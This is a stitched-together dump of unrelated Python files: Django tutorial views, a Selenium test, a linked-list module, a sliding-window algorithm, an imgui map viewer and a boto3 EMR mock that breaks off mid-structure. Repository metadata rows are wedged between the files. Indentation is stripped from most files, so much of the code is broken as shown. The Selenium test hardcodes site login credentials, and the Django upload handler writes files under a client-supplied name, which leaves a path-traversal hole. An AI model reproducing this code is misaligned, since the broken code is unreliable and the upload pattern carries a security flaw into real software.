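  vectorized_network = pol.get_initial()
  for _ in range(3):
    vectorized_network = vectorized_network + 0.01 * np.random.normal(
        size=vectorized_network.shape)  # SomeTransformationOf(...)
    pol.update(vectorized_network)
    print(pol.get_action(np.zeros(4)))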

# ===== /uhr.py | Mighty-Yth/Affinity (no license) =====
import discord
from discord.ext import commands
class Uhr:
def __init__(self, identity,user,EXP):
self.identity = identity
self.user= user
self.EXP = EXP
def __str__(self):
return self.identity + ':' + self.user+':' + str(self.EXP)
def deposit(self,amount):
if amount >= 0:
self.EXP += amount
def remove(self,amount):
if amount >= 0 and amount<= self.EXP:
            self.EXP -= amount

# ===== /booktest/views.py | oldestcrab/django_182 (no license) =====
from django.shortcuts import render, redirect
from django.http import HttpResponse, JsonResponse
from django.conf import settings
import os
from .models import *
from django.core.paginator import *
def index(request):
return HttpResponse('hello')
def detail(request, p1, p2, p3):
return HttpResponse('year:{p1},month:{p2},day:{p3}'.format(p1=p1, p2=p2, p3=p3))
def get_test1(request):
return render(request, 'booktest/get_test1.html')
def get_test2(request):
a1 = request.GET['a']
b1 = request.GET['b']
c1 = request.GET['c']
context = {'a':a1, 'b':b1, 'c':c1}
return render(request, 'booktest/get_test2.html', context)
def get_test3(request):
a1 = request.GET.getlist('a')
context = {'a':a1}
return render(request, 'booktest/get_test3.html', context)
def post_test1(request):
return render(request, 'booktest/post_test1.html')
def post_test2(request):
uname = request.POST['uname']
upwd = request.POST['upwd']
ugender = request.POST['ugender']
uhobby = request.POST.getlist('uhobby')
context = {'uname':uname, 'upwd':upwd, 'ugender':ugender, 'uhobby':uhobby}
return render(request, 'booktest/post_test2.html', context)
def session1(request):
uname = request.session.get('myname')
context = {'uname':uname}
return render(request, 'booktest/session1.html', context)
def session2(request):
return render(request, 'booktest/session2.html')
def session2_handle(request):
uname = request.POST['uname']
request.session['myname'] = uname
return redirect('/booktest/session1/')
def session3(request):
del request.session['myname']
return redirect('/booktest/session1/')
# csrf
def csrf1(request):
return render(request, 'booktest/csrf1.html')
def csrf2(request):
uname = request.POST['uname']
return HttpResponse(uname)
def upload_pic(request):
return render(request, 'booktest/upload_pic.html')
def upload_handle(request):
pic1 = request.FILES['pic1']
fname = os.path.join(settings.MEDIA_ROOT[0], str(pic1.name))
with open(fname, 'wb') as f:
for c in pic1.chunks():
f.write(c)
return HttpResponse(fname)
def herolist(request, pindex):
list = HeroInfo.objects.all()
paginator = Paginator(list, 4)
print(pindex)
if pindex =='':
pindex = '1'
page = paginator.page(int(pindex))
context = {'page':page}
return render(request, 'booktest/herolist.html', context)
def area(request):
return render(request, 'booktest/area.html')
def area2(request, id):
id1 = int(id)
if id1 == 0:
data = AreaInfo.objects.filter(parea__isnull=True)
else:
        data = AreaInfo.objects.filter(parea_id=id1)  # was data=[{}], which breaks the loop below
list = []
for area in data:
list.append([area.id, area.title])
return JsonResponse({'data':list})
def city(request, id):
citylist = AreaInfo.objects.filter(parea_id=id)
list = []
for item in citylist:
list.append({'id':item.id, 'title':item.title})
return JsonResponse({'data':list})
def html_editor(request):
    return render(request, 'booktest/html_editor.html')

# ===== /Learn_PhythonEx/ex6.py | dersonnex/Python_learning (no license) =====
x= "There are %d types of people." % 10 # defines variable x
binary = "binary" # defines variable binary
do_not = "don't" # defines variable do_not
y = "Those who know %s and those who %s." % (binary, do_not) # defines variable y
print x
print y
print "I said: %r." % x #I said :there are 10 types of people.
print "I also said: '%s'." % y
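# (%r prints the repr, quotes included, while %s prints the bare string; that is
#  why the "I said: %r." line above shows quotes around x.)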
hilarious = False
joke_evaluation = "Isn't that joke so funny?! %r"
print joke_evaluation % hilarious
w = "This is the left side of ..."
e = "a string with a right side."
print w + e

# ===== /bt5/erp5_wizard/WorkflowTemplateItem/portal_workflow/express_person_interaction_workflow/scripts/Assigment_openGlobalUserAssignment.py | jgpjuniorj/j (no license) =====
assignment = state_change['object']
person = assignment.getParentValue()
person.Person_validateGlobalUserAccount()

# ===== /POM_test/TestCase/Planting/TC_024.py | maxcrup007/Selenium_Webdriver_Python (no license) =====
# ทดสอบการเข้าใช้งานของ "ปลูก" (เลือกจำนวนเพาะปลูกมากกว่าพื้นที่)
import time
import unittest
import sys
from selenium import webdriver
from POM_test.login import *
from POM_test.plantPage import *
import os
sys.path.append(os.path.join(os.path.dirname(__file__), "...", "..."))
class TestPlanting_24(unittest.TestCase):
@classmethod
def setUpClass(self):
self.driver = webdriver.Chrome(executable_path="C:/Users/voraw/Downloads/Compressed/webdriver/chromedriver/chromedriver")
self.driver.implicitly_wait(10)
self.driver.maximize_window()
def test_login_valid(self):
driver = self.driver
self.driver.get("https://top-upstream-client.mulberrysoft.com/#/older/activity")
login = LoginPage(driver)
login.enter_username("demo005")
login.enter_password("123456")
login.click_login()
time.sleep(2)
plant = PlantPage(driver)
plant.into_plantPage()
plant.upload_picture()
time.sleep(2)
plant.next_function()
time.sleep(2)
plant.plant_enter_value("1000000")
# เลือกจำนวนเพาะปลูกมากกว่าพื้นที่
time.sleep(2)
plant.plant_enter_area("10")
time.sleep(2)
plant.plant_enter_crops()
time.sleep(2)
# driver.find_element_by_xpath("//ion-list[2]/ion-item/ion-select").click()
# driver.find_element_by_xpath("//button/div/div[2]").click()
# driver.find_element_by_xpath("//button[2]/span").click()
plant.plant_enter_garden()
time.sleep(2)
plant.plant_enter_unit()
time.sleep(2)
plant.plant_enter_area_unit()
time.sleep(2)
########################################################################
plant.plant_enter_products("100")
time.sleep(2)
plant.plant_enter_unit_products()
time.sleep(2)
plant.plant_enter_paid("1500")
time.sleep(2)
plant.plant_enter_submit()
time.sleep(2)
@classmethod
def tearDownClass(cls):
cls.driver.close()
cls.driver.quit()
print("Test Completed")
if __name__ == '__main__':
unittest.main()
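
# Sketch: Selenium's explicit waits could replace the fixed time.sleep(2) calls
# (the locator below is a placeholder; WebDriverWait/expected_conditions are
# stock Selenium):
#   from selenium.webdriver.support.ui import WebDriverWait
#   from selenium.webdriver.support import expected_conditions as EC
#   WebDriverWait(driver, 10).until(EC.presence_of_element_located(locator))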

# ===== /source/services/music/music_service.py | cash2one/gongzhuhao (no license) =====
#encoding:utf-8
__author__ = 'frank'
from services.base_services import BaseService
from models.share_do import ShareMusic
from utils.upload_utile import delete_from_oss
from tornado.options import options
class MusicServices(BaseService):
def create_share_music(self,**kwargs):
'''
        todo: add a new background music track
:param kwargs:
:return:
'''
share_music = ShareMusic()
share_music.Fmusic_name = kwargs.get('music_name')
share_music.Fmusic_url = kwargs.get('request_url')
self.db.add(share_music)
self.db.commit()
return share_music
def query_share_music(self,**kwargs):
'''
        todo: query background music tracks
:param kwargs:
:return:
'''
query = self.db.query(ShareMusic).filter(ShareMusic.Fdeleted == 0)
if kwargs.get('start_date',''):
query = query.filter(ShareMusic.Fcreate_time > kwargs.get('start_date'))
if kwargs.get('end_date',''):
query = query.filter(ShareMusic.Fcreate_time < kwargs.get('end_date')+' 23:59:59')
if kwargs.get('music_name',''):
query = query.filter(ShareMusic.Fmusic_name.like('%'+kwargs.get('music_name')+'%'))
return query
def delete_music(self,music_id):
'''
        todo: delete a background music track
        :param music_id: music track id
:return:
'''
query = self.db.query(ShareMusic).filter(ShareMusic.Fdeleted == 0,ShareMusic.Fid == music_id)
filename = query.scalar().Fmusic_url[34:]
data = {}
data['Fdeleted'] = 1
query.update(data)
self.db.commit()
delete_from_oss(options.MEDIA_BUCKET,filename)
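
# Usage sketch (hypothetical; BaseService wiring such as self.db comes from the
# surrounding app):
#   svc = MusicServices()
#   svc.create_share_music(music_name='intro', request_url='http://example.com/intro.mp3')
#   svc.query_share_music(music_name='intro').count()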

# ===== /django-backend/djangoapi/tests.py | christiancp100/VRecommender-3.0 (no license) =====
from django.test import TestCase
from djangoapi import search
from elasticsearch import Elasticsearch
import requests
class ElasticsearchTestCase(TestCase):
def setUp(self):
self.client = Elasticsearch("http://elasticsearch:9200")
self.all_indices = self.client.indices.get_alias("*")
def test_connection(self):
status = self.client.ping()
self.assertTrue(status)
def test_index_existance(self):
exist = "objects" in self.all_indices
self.assertTrue(exist)
class QueriesTestCase(TestCase):
def setUp(self):
        self.fieldsList = requests.get('http://localhost:8000/columns')  # fixed 'llocalhost' typo
# TODO
# def test_describe_query(self):
# for field in self.fieldsList:
# if field['type'] == numerical:
# response = requests.get('http://localhost:8000/describe/?column=' + field['value'])
# if responsep['count']
class EndPointsTestCase(TestCase):
def setUp(self):
pass
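
# Sketch: the same connectivity probe outside the test runner (the hostname
# 'elasticsearch' assumes the docker network used by this project):
#   es = Elasticsearch("http://elasticsearch:9200")
#   assert es.ping()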

# ===== /old/PSD_Plotter.py | nm96/MSc_project_code (no license) =====
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker
from matplotlib import rc
import sys
import pickle
# Set a nice font for the plots when on Linux
if sys.platform == 'linux':
rc('font',**{'family':'serif','serif':['Computer Modern Roman']})
rc('text', usetex=True)
# Get input file from commmand line
inpf = sys.argv[1] # i.e. "spec_data.pkl"
# Read input file
with open(inpf, 'rb') as f:
params, om, P = pickle.load(f)
# Note:
# model = (mdl.NHSommerfeld2,(Om,h,B))
# params = (eps,Om,m,c,k,model)
# Get parameters to label the plot with
om_max = om[-1]
Om = params[1]
om_nat = (params[4]/params[2])**0.5
B = params[-1][-1][-1]
c = params[3]
fn = 0 # Initialize figure number for plotting
fn += 1; fig = plt.figure(fn,figsize=[12,6])
# Plot spectrum, label:
ax = fig.add_subplot(111)
ax.set_xlim([0,om_max])
ax.axvline(om_nat,ls='--',c='g',label=r"$\omega_{nat}$")
ax.axvline(Om,ls='--',c='r',label=r"$\Omega$")
ax.semilogy(om,P,c='k')
locmaj = matplotlib.ticker.LogLocator(base=100,numticks=30)
ax.yaxis.set_major_locator(locmaj)
locmin = matplotlib.ticker.LogLocator(base=100,subs=(0.2,0.4,0.6,0.8),numticks=50)
ax.yaxis.set_minor_locator(locmin)
ax.yaxis.set_minor_formatter(matplotlib.ticker.NullFormatter())
ax.grid()
ax.set_title(r"""$\beta = {:.2f}$, $\Omega = {:.2f}$, $c = {:.2f}$""".format(B,Om,c))
ax.set_ylabel("$P(\omega)$",rotation=0)
ax.yaxis.labelpad = 20
ax.set_xlabel("$\omega$")
ax.legend()
plt.tight_layout()
#fig.savefig("../plots/sparse_peak_spectrum.eps".format(B))
plt.show()
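
# Sketch of writing a compatible input file (field order per the Note above;
# the values themselves are placeholders):
#   with open('spec_data.pkl', 'wb') as f:
#       pickle.dump((params, om, P), f)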

# ===== /GUI/config.py | trifwn/Atlas_Rocket (MIT) =====
import os
"MIT"
] | permissive | trifwn/Atlas_Rocket | 36ec1b0e59181dab45a16743a670532eb8e4e797 | aeb8b6fea75b8f6b94af662bbaec0ae212e02bae | refs/heads/master | 2022-04-17T03:34:30.614890 | 2020-04-05T21:40:49 | 2020-04-05T21:40:49 | 229,804,020 | 1 | 0 | null | 2020-03-31T14:52:34 | 2019-12-23T18:31:23 | Python | UTF-8 | Python | false | false | 1,214 | py | import os
import time
from collections import deque
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
DATA_PATH = os.path.join(BASE_PATH, "data")
def init():
'''
Defining globals and initializing them
'''
max_length = 100
global times, temperature, pressure, humidity, altitude, or_x, or_y, or_z, vel_x, vel_y, vel_z, acc_x, acc_y, acc_z
times = deque(maxlen=max_length)
temperature = deque(maxlen=max_length)
pressure = deque(maxlen=max_length)
humidity = deque(maxlen=max_length)
altitude = deque(maxlen=max_length)
#orientation
or_x = deque(maxlen=max_length)
or_y = deque(maxlen=max_length)
or_z = deque(maxlen=max_length)
#velocity
vel_x = deque(maxlen=max_length)
vel_y = deque(maxlen=max_length)
vel_z = deque(maxlen=max_length)
#acceleration
acc_x = deque(maxlen=max_length)
acc_y = deque(maxlen=max_length)
acc_z = deque(maxlen=max_length)
global data_dict
data_dict = {
'Temperature': temperature,
'Pressure': pressure,
'Humidity': humidity,
'Altitude': altitude,
'3D Cone plot': (vel_x, vel_y, vel_z, or_x, or_y, or_z),
'x-y-z-move': (or_x, or_y, or_z),
'Velocity for x-y-z': (vel_x, vel_y, vel_z),
'Acceleration for x-y-z': (acc_x, acc_y, acc_z)
    }

# ===== /backend/dark_waterfall_26026/wsgi.py | crowdbotics-apps/dark-waterfall-26026 (no license) =====
"""
WSGI config for dark_waterfall_26026 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'dark_waterfall_26026.settings')
application = get_wsgi_application()

# ===== /linkedlist.py | maihan040/Python_Random_Scripts (no license) =====
#
#module name: linkedlist.py
#
#purpose: class definition for a linked list
#
#date created: 09/04/2019
#
#version: 1.0
#
#########################################################
# Import modules #
#########################################################
import node
#########################################################
# Class definition #
#########################################################
class linkedlist:
#constructor
def __init__ (self, head=None):
self.head = head
#print
def printList(self):
current = self
while current.next is not None:
print(str(current.data) + "->", end="")
current = current.next
print(current.data)
#iterative apprach
def mergeListIterative(self, l1, l2):
#locale names
current = None
root = None
while(True):
if(l1 == None):
nextNode = l2
elif(l2 == None):
nextNode = l1
elif(l1.data < l2.data):
nextNode = l1
else:
nextNode = l2
#advance the position in the respective linkedlist
if(nextNode == l1):
l1 = l1.next if l1 else None
if(nextNode == l2):
l2 = l2.next if l2 else None
#check if end has been reached
if(nextNode == None):
break
#merge the list
if not current:
current = nextNode
root = current
else:
current.next = nextNode
current = nextNode
#return the root of the merged linked list
return root
    #recursive approach
def mergeListRecursive(self, l1, l2):
#base case
if(l1 == None):
return l2
elif(l2 == None):
return l1
elif(l1.data < l2.data):
l1.next = self.mergeListRecursive(l1.next, l2)
return l1
else:
l2.next = self.mergeListRecursive(l1, l2.next)
return l2
#add two numbers represented as linked lists
    #iterative function; runs while either list still has digits left
def addNum(self, first, second):
root = None
prev = None
temp = None
carry = 0
        while(first is not None or second is not None):
fdata = 0 if first is None else first.data
sdata = 0 if second is None else second.data
sum = fdata + sdata + carry
#compute the next carry
carry = 1 if sum >= 10 else 0
sum = sum if sum < 10 else sum %10
print("Sum is : " +str(sum))
temp = node.node(sum)
            #check whether the head of this list is empty
if root is None:
root = temp
else:
prev.next = temp
prev = temp
#advance both lists
if first is not None:
first = first.next
if second is not None:
second = second.next
#add remaining carry if any
if carry:
temp.next = node.node(carry)
#return the root
return root
#reverse list via an iterative approach
    def reverselistIteratively(self, head):
        if head is None:
            return None
        #walk the list once, pointing each node back at its predecessor
        prev = None
        current = head
        while current is not None:
            nxt = current.next
            current.next = prev
            prev = current
            current = nxt
        #prev is the old tail, i.e. the new head
        return prev
#reverse list via a recursive approach
    def reverseListRecursive(self, curr, prev=None):
        #base case: empty list
        if curr is None:
            return None
        #base case: the last node becomes the new head
        if curr.next is None:
            curr.next = prev
            return curr
        #relink the current node behind itself and recurse on the rest
        nxt = curr.next
        curr.next = prev
        return self.reverseListRecursive(nxt, curr)
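    # Hedged usage sketch for the recursive reversal above (assumes, like the
    # driver below, that node objects expose .data/.next and printList):
    #   head = node.node(1); head.next = node.node(2); head.next.next = node.node(3)
    #   new_head = linkedlist().reverseListRecursive(head)
    #   new_head.printList()   # expected: 3->2->1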
#########################################
# Driver #
#########################################
a = node.node(1)
a.next = node.node(3)
a.next.next = node.node(5)
b = node.node(2)
b.next = node.node(8)
b.next.next = node.node(6)
c = node.node(10)
c.next = node.node(12)
c.next.next = node.node(14)
d = node.node(11)
d.next = node.node(13)
d.next.next = node.node(15)
'''
#iteratirve approach
print("-------------------------------------------------------------")
print("Iterative apprach ")
print("First list " )
a.printList()
print("Second list ")
b.printList()
print("Merging both lists via iterative approach")
result_iterative = linkedlist().mergeListIterative(a,b)
print("The merged linked list is: ")
result_iterative.printList()
#recursive approach
print("-------------------------------------------------------------")
print("Recursive approach ")
print("First list ")
c.printList()
print("Second list")
d.printList()
print("Merging both lists via recursive approach")
result_recursive = linkedlist().mergeListRecursive(c,d)
print("Merged linked list is: ")
result_recursive.printList()
#add numbers
print("-------------------------------------------------------------")
print("Adding lists")
print("First list ")
a.printList()
print("Second list")
b.printList()
print("Adding both numbers")
result_sum = linkedlist().addNum(a,b)
print("Added linked list is: ")
result_sum.printList()
#reverse list via an iterative approach
print("-------------------------------------------------------------")
print("Reversing list iteratively")
print("List before reversal ")
a.printList()
rev_list = linkedlist().reverselistIteratively(a)
print("After reversal list is: ")
rev_list.printList()
'''
#recursive approach
print("-------------------------------------------------------------")
print("Recursive approach ")
print("First list ")
c.printList()
print("Second list")
d.printList()
print("Merging both lists via recursive approach")
result_recursive = linkedlist().mergeListRecursive(c,d)
print("Merged linked list is: ")
result_recursive.printList() | [
"[email protected]"
] | |
fa65a404c6278a30b5a8e1d2c8079c85f4f85dce | 449f6888bff99d7e4fd86fa6ffa6b3316084e34e | /Solutions/018.py | b91be816ebd66827c26c6ae1526c59a9b3b118b9 | [
"MIT"
] | permissive | All3yp/Daily-Coding-Problem-Solutions | e94679a5858b8a83ffe58d14b824fe80de21a694 | 199b9606474edb45bd14b20b511b691ada437586 | refs/heads/master | 2023-03-18T21:06:30.675503 | 2021-03-13T03:52:31 | 2021-03-13T03:52:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,622 | py | """
Problem:
Given an array of integers and a number k, where 1 <= k <= length of the array, compute
the maximum values of each subarray of length k.
For example, given array = [10, 5, 2, 7, 8, 7] and k = 3, we should get: [10, 7, 8, 8],
since:
10 = max(10, 5, 2)
7 = max(5, 2, 7)
8 = max(2, 7, 8)
8 = max(7, 8, 7)
Do this in O(n) time and O(k) space. You can modify the input array in-place and you do
not need to store the results. You can simply print them out as you compute them.
"""
from collections import deque
from typing import List
def calc_max_per_k_elems(arr: List[int], k: int) -> List[int]:
length = len(arr)
if not arr:
return None
    if length <= k:
        # a single window covers the whole array
        return [max(arr)]
# storing results (even though the problem states it can be directly printed)
result = []
dq = deque()
# calculating the 1st element
for i in range(k):
while dq and arr[dq[-1]] < arr[i]:
dq.pop()
dq.append(i)
result.append(arr[dq[0]])
# generating the rest of the resultant elements
for i in range(k, length):
# removing all elements apart from the last k elements
while dq and dq[0] <= i - k:
dq.popleft()
# removing the elements smaller than the current element
while dq and arr[dq[-1]] < arr[i]:
dq.pop()
dq.append(i)
result.append(arr[dq[0]])
return result
if __name__ == "__main__":
print(calc_max_per_k_elems([10, 5, 2, 7, 8, 7], 3))
print(calc_max_per_k_elems([1, 91, 17, 46, 45, 36, 9], 3))
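    # expected output, worked by hand:
    #   [10, 7, 8, 8]
    #   [91, 91, 46, 46, 45]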
"""
SPECS:
TIME COMPLEXITY: O(n)
SPACE COMPLEXITY: O(k)
"""
| [
"[email protected]"
] | |
9717ae1685d9e0be1f4fca244bca7a10cb2aeb8b | c2cd846ea3d2947587a5bfe1ad8cfc419e0fc98f | /gui/app.py | c345b7be2ccd5925f810121a5350d92dcf4263aa | [
"MIT"
] | permissive | txxia/starbound-map | d5eac43add27076703a7918f574a32807b258f37 | a0231cbc0d14aed072246061280084bb7eaf5d04 | refs/heads/master | 2023-07-19T20:05:10.729118 | 2019-08-08T01:19:10 | 2019-08-08T01:19:29 | 136,258,912 | 14 | 0 | MIT | 2023-07-16T23:45:16 | 2018-06-06T02:13:12 | Python | UTF-8 | Python | false | false | 1,906 | py | import glfw
from gui.core import *
from gui.widgets.job_overlay import JobOverlay
from gui.windows.about import AboutWindow
from gui.windows.mapcontrol import MapControllerWindow
from gui.windows.mapview import MapWindow
from gui.windows.usage import UsageWindow
from map.renderer import WorldRenderer
class StarboundMap(GUIElement):
def __init__(self, world_renderer: WorldRenderer):
state = GUIState(root=self)
super().__init__(state)
self.set_styles()
self.add_child(MapWindow(self.state, renderer=world_renderer))
self.add_child(MapControllerWindow(self.state))
self.add_child(UsageWindow(self.state))
self.add_child(AboutWindow(self.state))
self.add_child(JobOverlay(self.state))
def gui(self):
imgui.new_frame()
self.show_menu_bar()
self.state.render_params.time_in_seconds = glfw.get_time() # TODO remove glfw calls
for child in self.children:
child.gui()
# imgui.show_test_window()
# self.show_debug_window()
imgui.render()
def show_menu_bar(self):
if imgui.begin_main_menu_bar():
if imgui.begin_menu("Help"):
if imgui.menu_item("User Guide")[0]:
self.send_event(GUIEventType.OPEN_WINDOW, arg=WindowName.USER_GUIDE)
if imgui.menu_item("About")[0]:
self.send_event(GUIEventType.OPEN_WINDOW, arg=WindowName.ABOUT)
imgui.end_menu()
imgui.end_main_menu_bar()
def show_debug_window(self):
imgui.label_text("time", '{:.1f}'.format(glfw.get_time()))
imgui.label_text("fps", '{:.1f}'.format(self.io.framerate))
imgui.label_text("mouse", '{:.1f}, {:.1f}'.format(self.io.mouse_pos.x,
self.io.mouse_pos.y))
def set_styles(self):
pass
| [
"[email protected]"
] | |
3e563019b3d7db6d3ec9a95f54d4b81a39d0a957 | 121ae77d5a4410d1a74c4d2abb35910fc1ee501c | /tests/mock_emr.py | 988e8644763eee5ca08f517ccd3d29d747429469 | [
"MIT"
] | permissive | warrenronsiek/emrcli | 6baee85a27c3106cc55ca31feccfb804f6c3d17c | 0874ae40be480e9f274867bc526fb6757b3db51e | refs/heads/master | 2020-08-02T23:01:45.357969 | 2019-05-10T19:24:55 | 2019-05-10T19:24:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,895 | py | from datetime import datetime
def mock_emr_client(*args, **kwargs):
class TestEmrClient:
@classmethod
def run_job_flow(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0}, "JobFlowId": "s-SNGBtA88"}
@classmethod
def terminate_job_flows(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0}}
@classmethod
def describe_cluster(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0},
'Cluster': {
'Id': 's-SNGBtA88l',
'Name': 'test_cluster',
'Status': {
'State': 'RUNNING',
'Timeline': {
'CreationDateTime': datetime(2017, 1, 1),
'ReadyDateTime': datetime(2017, 1, 1),
'EndDateTime': datetime(2017, 1, 1)
}
},
'InstanceCollectionType': 'INSTANCE_GROUP',
'MasterPublicDnsName': 'ip-10-22-182-88',
}
}
@classmethod
def list_instance_fleets(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0},
'InstanceFleets': [
{
'Id': 'id1',
'Name': 'Master',
'Status': {
'State': 'RUNNING',
'Timeline': {
'CreationDateTime': datetime(2017, 1, 1),
'ReadyDateTime': datetime(2017, 1, 1),
'EndDateTime': datetime(2017, 1, 1)
}
},
'InstanceFleetType': 'MASTER',
'TargetOnDemandCapacity': 1,
'ProvisionedOnDemandCapacity': 1,
'InstanceTypeSpecifications': [
{
'InstanceType': 'm4.4xlarge',
'WeightedCapacity': 100,
'BidPrice': '0.40',
'BidPriceAsPercentageOfOnDemandPrice': 100.0,
'Configurations': [
{
'Classification': 'spark-defaults',
'Properties': {
'spark.ssl.ui.enabled': 'false',
'spark.authenticate.secret': 'foo'
},
'Configurations': []
},
{
'Classification': 'yarn-site',
'Properties': {
'yarn.resourcemanager.am.max-attempts': '1'
},
'Configurations': []
},
{
'Classification': 'core-site',
'Properties': {
'fs.s3.canned.acl': 'BucketOwnerFullControl'
},
'Configurations': []
}
],
'EbsBlockDevices': [
{
'VolumeSpecification': {
'VolumeType': 'gp2',
'SizeInGB': 100
},
'Device': 'string'
},
],
                             'EbsOptimized': False  # concrete value; "True | False" was boto3 doc placeholder syntax
},
],
'LaunchSpecifications': {
'SpotSpecification': {
'TimeoutDurationMinutes': 5,
'TimeoutAction': 'SWITCH_TO_ON_DEMAND',
'BlockDurationMinutes': 120
}
}
},
{
'Id': 'id2',
'Name': 'Core',
'Status': {
'State': 'RUNNING',
'Timeline': {
'CreationDateTime': datetime(2017, 1, 1),
'ReadyDateTime': datetime(2017, 1, 1),
'EndDateTime': datetime(2017, 1, 1)
}
},
'InstanceFleetType': 'CORE',
'TargetSpotCapacity': 2,
'ProvisionedSpotCapacity': 2,
'InstanceTypeSpecifications': [
{
'InstanceType': 'm4.4xlarge',
'WeightedCapacity': 100,
'BidPrice': '0.40',
'BidPriceAsPercentageOfOnDemandPrice': 100.0,
'Configurations': [
{
'Classification': 'spark-defaults',
'Properties': {
'spark.ssl.ui.enabled': 'false',
'spark.authenticate.secret': 'foo'
},
'Configurations': []
},
{
'Classification': 'yarn-site',
'Properties': {
'yarn.resourcemanager.am.max-attempts': '1'
},
'Configurations': []
},
{
'Classification': 'core-site',
'Properties': {
'fs.s3.canned.acl': 'BucketOwnerFullControl'
},
'Configurations': []
}
],
'EbsBlockDevices': [
{
'VolumeSpecification': {
'VolumeType': 'gp2',
'SizeInGB': 100
},
'Device': 'string'
},
],
                             'EbsOptimized': False  # concrete value; "True | False" was boto3 doc placeholder syntax
},
],
'LaunchSpecifications': {
'SpotSpecification': {
'TimeoutDurationMinutes': 5,
'TimeoutAction': 'SWITCH_TO_ON_DEMAND',
'BlockDurationMinutes': 120
}
}
}
]
}
@classmethod
def list_instance_groups(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0},
'InstanceGroups': [
{
'Id': 'id1',
'Name': 'Master',
'Market': 'ON_DEMAND',
'InstanceGroupType': 'MASTER',
'InstanceType': 'm4.4xlarge',
'RequestedInstanceCount': 1,
'RunningInstanceCount': 1,
'Status': {
'State': 'RUNNING',
'Timeline': {
'CreationDateTime': datetime(2017, 1, 1),
'ReadyDateTime': datetime(2017, 1, 1),
'EndDateTime': datetime(2017, 1, 1)
}
},
'Configurations': [
{
'Classification': 'spark-defaults',
'Properties': {
'spark.ssl.ui.enabled': 'false',
'spark.authenticate.secret': 'foo'
},
'Configurations': []
},
{
'Classification': 'yarn-site',
'Properties': {
'yarn.resourcemanager.am.max-attempts': '1'
},
'Configurations': []
},
{
'Classification': 'core-site',
'Properties': {
'fs.s3.canned.acl': 'BucketOwnerFullControl'
},
'Configurations': []
}
],
'EbsBlockDevices': [
{
'VolumeSpecification': {
'VolumeType': 'gp2',
'SizeInGB': 100
},
'Device': 'string'
},
],
'EbsOptimized': False,
},
{
'Id': 'id2',
'Name': 'Core',
'Market': 'SPOT',
'InstanceGroupType': 'CORE',
'BidPrice': '0.40',
'InstanceType': 'm4.4xlarge',
'RequestedInstanceCount': 2,
'RunningInstanceCount': 2,
'Status': {
'State': 'RUNNING',
'Timeline': {
'CreationDateTime': datetime(2017, 1, 1),
'ReadyDateTime': datetime(2017, 1, 1),
'EndDateTime': datetime(2017, 1, 1)
}
},
'Configurations': [
{
'Classification': 'spark-defaults',
'Properties': {
'spark.ssl.ui.enabled': 'false',
'spark.authenticate.secret': 'foo'
},
'Configurations': []
},
{
'Classification': 'yarn-site',
'Properties': {
'yarn.resourcemanager.am.max-attempts': '1'
},
'Configurations': []
},
{
'Classification': 'core-site',
'Properties': {
'fs.s3.canned.acl': 'BucketOwnerFullControl'
},
'Configurations': []
}
],
'EbsBlockDevices': [
{
'VolumeSpecification': {
'VolumeType': 'gp2',
'SizeInGB': 100
},
'Device': 'string'
},
],
'EbsOptimized': False,
},
]
}
@classmethod
def add_job_flow_steps(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0},
'StepIds': [
'stepId1',
'stepId2'
]
}
@classmethod
def list_instances(cls, **kwargs):
return {"ResponseMetadata": {"HTTPHeaders": {"content-length": "1624",
"content-type": "application/x-amz-json-1.1",
"date": "Mon, 02 Jul 2017 23:44:46 GMT",
"x-amzn-requestid": "e7371e56-7e51-11e8-b253-4754b23ad999"},
"HTTPStatusCode": 200,
"RequestId": "e7371e56-7e51-11e8-b253-4754b23ad999",
"RetryAttempts": 0},
'Instances': [
{'Id': 'ci-3SC4IQXMO1PSK',
'Ec2InstanceId': 'i-0576b968542bb508f',
'PublicDnsName': '',
'PrivateDnsName': 'ip-11-225-183-7.ec2.internal',
'PrivateIpAddress': '11.225.183.7',
'Status': {'State': 'TERMINATED',
